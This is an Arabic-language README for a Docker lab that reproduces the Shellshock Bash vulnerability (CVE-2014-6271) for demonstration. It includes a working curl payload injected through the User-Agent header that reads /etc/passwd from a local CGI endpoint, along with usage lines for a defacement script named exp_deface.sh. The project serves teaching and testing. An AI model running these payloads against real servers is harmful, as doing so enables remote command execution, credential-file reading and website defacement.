
مشروع عرض CVE (ShellShock) مع pdf، عرض تقني وقابل للتكرار
يتيح هذا المشروع إعادة إنتاج الثغرة الأمنية CVE-2014-6271، المعروفة أيضًا باسم Shellshock. شيلشوك هي ثغرة أمنية في Bash تسمح بتنفيذ كود ضار عبر متغيرات البيئة.
الهدف من هذا المشروع هو إظهار تأثير هذه الثغرة على بيئة Docker.
قبل البدء، تأكد من تثبيت Docker على جهازك. يمكنك تنزيل Docker هنا.
في مجلد المشروع، قم ببناء صورة Docker بتنفيذ الأمر التالي:
docker build -t ['image name'] .
استبدل ['image name'] بالاسم الذي ترغب في إعطائه لصورة Docker.
بمجرد بناء الصورة، قم بتشغيل حاوية باستخدام هذه الصورة بالأمر التالي:
docker run -it --rm -p 8080:80 ['image name']
سيؤدي ذلك إلى عرض الخدمة على المنفذ 8080 على جهازك المحلي.
افتح متصفحك وانتقل إلى http://localhost:8080. ستتمكن من ملاحظة سلوك التطبيق واختبار الثغرة.
في محطة طرفية أخرى، نفذ الأمر التالي لاستغلال الثغرة وقراءة محتوى الملف /etc/passwd:
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://localhost:8080/cgi-bin/vulnerable
يُرسل هذا الأمر رأس user-agent مصممًا خصيصًا لاستغلال شيلشوك. إذا تم إعادة إنتاج الثغرة بشكل صحيح، فسيظهر محتوى /etc/passwd في مخرجات المحطة الطرفية.
يتيح هذا النص استغلال الثغرة لتشويه صفحة ويب مستهدفة. تعتمد الثغرة على تكوين خاطئ لبرامج CGI النصية، مما يسمح بتنفيذ أوامر عشوائية على الخادم.
المتطلبات: تأكد من أن الهدف معرض لخطأ ShellShock. تأكد من أن لديك الأذونات اللازمة لاختبار الاستغلال على هذا الهدف.
./exp_deface.sh <ip> <port>
./exp_deface.sh localhost 8080
هام: يجب استخدام هذه الثغرة فقط لأغراض الاختبار والعرض التوضيحي في بيئة خاضعة للرقابة. لا تستخدم هذا المشروع في بيئات الإنتاج.